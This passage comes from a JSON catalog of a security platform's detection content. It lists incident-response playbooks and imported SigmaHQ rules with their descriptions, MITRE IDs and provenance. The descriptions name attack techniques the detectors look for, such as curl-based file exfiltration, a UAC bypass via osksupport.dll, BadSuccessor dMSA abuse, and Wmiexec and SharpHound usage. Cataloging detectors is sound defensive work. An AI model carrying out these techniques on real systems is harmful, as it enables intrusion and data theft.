Quarantines the message across the tenant, extracts and blocks malicious URLs and sender domains, identifies other recipients, and triggers user awareness notifications.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "phishing", "email", "identity", "containment" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/phishing-response.yaml" }, { "id": "privilege-escalation-response-v1", "type": "detection", "name": "Privilege Escalation Response", "description": "Responds to detected privilege escalation attempts including sudo abuse, SUID/SGID exploitation, token impersonation, or role assignment anomalies. Revokes elevated privileges, isolates the session, and logs forensic evidence.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "privilege-escalation", "endpoint", "linux", "windows", "iam" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/privilege-escalation-response.yaml" }, { "id": "ransomware-containment-v1", "type": "detection", "name": "Ransomware Containment & Eradication", "description": "Automated containment and eradication playbook for ransomware incidents. 
Isolates affected hosts, blocks C2 IPs, snapshots disk state for forensics, and notifies the security team with remediation steps.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "ransomware", "malware", "containment", "endpoint", "high-severity" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/ransomware-containment.yaml" }, { "id": "s3-bucket-exposure-response-v1", "type": "detection", "name": "S3 Bucket Exposure Response", "description": "Responds to S3 bucket misconfigurations including public access enablement, ACL changes granting anonymous access, and unexpected data exfiltration from buckets. Remediates public access, audits bucket policy, and notifies cloud security.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "s3", "cloud", "aws", "misconfiguration", "data-exposure" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/s3-bucket-exposure-response.yaml" }, { "id": "sigmahq-sigma-0022869c-49f7-4ff2-ba03-85ac42ddac58", "type": "detection", "name": "System Information Discovery via Registry Queries", "description": "Detects attempts to query system information directly from the Windows Registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-via-registry-queries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "0022869c-49f7-4ff2-ba03-85ac42ddac58", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml" } }, { "id": "sigmahq-sigma-002bdb95-0cf1-46a6-9e08-d38c128a6127", "type": "detection", "name": "WScript or CScript Dropper - File", "description": "Detects a file ending in jse, vbe, js, vba, vbs, wsf, wsh written by cscript.exe or wscript.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wscript-or-cscript-dropper-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" } }, { "id": "sigmahq-sigma-00321fee-ca72-4cce-b011-5415af3b9960", "type": "detection", "name": "MSSQL Destructive Query", "description": "Detects the invocation of MS SQL transactions that are destructive towards table or database data, such as \"DROP TABLE\" or \"DROP DATABASE\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/mssql-destructive-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00321fee-ca72-4cce-b011-5415af3b9960", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_destructive_query.yml" } }, { "id": "sigmahq-sigma-0055ad1f-be85-4798-83cf-a6da17c993b3", "type": "detection", "name": "Application URI Configuration Changes", "description": "Detects when a configuration change is made to an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-uri-configuration-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0055ad1f-be85-4798-83cf-a6da17c993b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_uri_modifications.yml" } }, { "id": "sigmahq-sigma-0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "type": "detection", "name": "UAC Bypass Using Windows Media Player - Process", "description": "Detects the pattern of UAC Bypass using Windows Media Player 
osksupport.dll (UACMe 32)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-windows-media-player-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" } }, { "id": "sigmahq-sigma-00b90cc1-17ec-402c-96ad-3a8117d7a582", "type": "detection", "name": "Suspicious Curl File Upload - Linux", "description": "Detects a suspicious curl process start that adds a file to a web request (file upload)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-curl-file-upload-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00b90cc1-17ec-402c-96ad-3a8117d7a582", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" } }, { "id": "sigmahq-sigma-00ba9da1-b510-4f6b-b258-8d338836180f", "type": "detection", "name": "Password Protected 
ZIP File Opened", "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-protected-zip-file-opened.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00ba9da1-b510-4f6b-b258-8d338836180f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" } }, { "id": "sigmahq-sigma-00bb5bd5-1379-4fcf-a965-a5b6f7478064", "type": "detection", "name": "Windows Firewall Settings Have Been Changed", "description": "Detects activity when the settings of the Windows firewall have been changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-firewall-settings-have-been-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" } }, { "id": "sigmahq-sigma-00d0b5ab-1f55-4120-8e83-487c0a7baf19", "type": "detection", "name": "Download From Suspicious TLD - Blacklist", "description": "Detects download of certain file types from hosts in suspicious TLDs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1203", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/download-from-suspicious-tld-blacklist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml" } }, { "id": "sigmahq-sigma-00d49ed5-4491-4271-a8db-650a4ef6f8c1", "type": "detection", "name": "Suspicious Download from Office Domain", "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1608" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-download-from-office-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" } }, { "id": "sigmahq-sigma-00eee2a5-fdb0-4746-a21d-e43fbdea5681", "type": "detection", "name": "Linux Doas Conf File Creation", "description": "Detects the creation of doas.conf file in linux host platform.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/linux-doas-conf-file-creation.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_doas_conf_creation.yml" } }, { "id": "sigmahq-sigma-0152550d-3a26-4efd-9f0e-54a0b28ae2f3", "type": "detection", "name": "Detection of PowerShell Execution via Sqlps.exe", "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/detection-of-powershell-execution-via-sqlps-exe.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml" } }, { "id": "sigmahq-sigma-01aeb693-138d-49d2-9403-c4f52d7d3d62", "type": "detection", "name": "RDP Connection Allowed Via Netsh.EXE", "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-connection-allowed-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml" } }, { "id": "sigmahq-sigma-01c42d3c-242d-4655-85b2-34f1739632f7", "type": "detection", "name": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", "description": "Detects usage of Dsacls to grant over permissive permissions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-over-permissive-permissions-granted-using-dsacls-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "01c42d3c-242d-4655-85b2-34f1739632f7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" } }, { "id": "sigmahq-sigma-01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "type": "detection", "name": "Uncommon Svchost Parent Process", "description": "Detects an uncommon svchost parent process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-svchost-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml" } }, { "id": "sigmahq-sigma-02030f2f-6199-49ec-b258-ea71b07e03dc", "type": "detection", "name": "Malicious PowerShell Commandlets - ProcessCreation", "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1482", 
"T1087", "T1087.001", "T1087.002", "T1069.001", "T1069.002", "T1069", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-commandlets-processcreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02030f2f-6199-49ec-b258-ea71b07e03dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml" } }, { "id": "sigmahq-sigma-02122374-b74e-495c-b285-9e4da973f3d6", "type": "detection", "name": "DMSA Service Account Created in Specific OUs - PowerShell", "description": "Detects the creation of a dMSA service account using the New-ADServiceAccount cmdlet in certain OUs.\nThe fact that the cmdlet is used to create a dMSASvc account in a specific OU is highly suspicious.\nIt is a pattern trying to exploit the BadSuccessor privilege escalation vulnerability in Windows Server 2025.\nOn top of that, if the user that is creating the dMSASvc account is not a legitimate administrator or does not have the necessary permissions,\nit is a strong signal of an attempted or successful abuse of the BaDSuccessor vulnerability for privilege escalation within the Windows Server 2025 Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dmsa-service-account-created-in-specific-ous-powershell.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02122374-b74e-495c-b285-9e4da973f3d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_create_new_dmsasvc_account.yml" } }, { "id": "sigmahq-sigma-021310d9-30a6-480a-84b7-eaa69aeb92bb", "type": "detection", "name": "First Time Seen Remote Named Pipe - Zeek", "description": "This detection excludes known named pipes that are accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/first-time-seen-remote-named-pipe-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "021310d9-30a6-480a-84b7-eaa69aeb92bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" } }, { "id": "sigmahq-sigma-022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", "type": "detection", "name": "HackTool - Wmiexec Default Powershell Command", "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-wmiexec-default-powershell-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml" } }, { "id": "sigmahq-sigma-023394c4-29d5-46ab-92b8-6a534c6f447b", "type": "detection", "name": "Suspicious HWP Sub Processes", "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1203", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-hwp-sub-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "023394c4-29d5-46ab-92b8-6a534c6f447b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" } }, { "id": "sigmahq-sigma-023c654f-8f16-44d9-bb2b-00ff36a62af9", "type": "detection", "name": "Python Function Execution Security Warning Disabled In Excel", "description": "Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when 
Python functions are about to be executed.\nThreat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-function-execution-security-warning-disabled-in-excel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "023c654f-8f16-44d9-bb2b-00ff36a62af9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_office_disable_python_security_warnings.yml" } }, { "id": "sigmahq-sigma-0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "type": "detection", "name": "ISO Image Mounted", "description": "Detects the mount of an ISO image on an endpoint", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iso-image-mounted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_iso_mount.yml" } 
}, { "id": "sigmahq-sigma-0250638a-2b28-4541-86fc-ea4c558fa0c6", "type": "detection", "name": "Suspicious Browser Child Process - MacOS", "description": "Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1189", "T1203", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-browser-child-process-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0250638a-2b28-4541-86fc-ea4c558fa0c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml" } }, { "id": "sigmahq-sigma-0255a820-e564-4e40-af2b-6ac61160335c", "type": "detection", "name": "A New Trust Was Created To A Domain", "description": "Creation of a new domain trust is rare and should be verified for legitimacy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/a-new-trust-was-created-to-a-domain.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0255a820-e564-4e40-af2b-6ac61160335c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" } }, { "id": "sigmahq-sigma-025bd229-fd1f-4fdb-97ab-20006e1a5368", "type": "detection", "name": "Unusual File Download from Direct IP Address", "description": "Detects the download of suspicious file type from URLs with IP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-file-download-from-direct-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" } }, { "id": "sigmahq-sigma-025c9fe7-db72-49f9-af0d-31341dd7dd57", "type": "detection", "name": "Azure Firewall Rule Collection Modified or Deleted", "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-firewall-rule-collection-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "025c9fe7-db72-49f9-af0d-31341dd7dd57", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_firewall_rule_collection_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-02773bed-83bf-469f-b7ff-e676e7d78bab", "type": "detection", "name": "BloodHound Collection Files", "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.001", "T1087.002", "T1482", "T1069.001", "T1069.002", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bloodhound-collection-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" } }, { "id": "sigmahq-sigma-028c7842-4243-41cd-be6f-12f3cf1a26c7", "type": "detection", "name": "AD Object WriteDAC Access", "description": "Detects WRITE_DAC access to a domain object", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ad-object-writedac-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
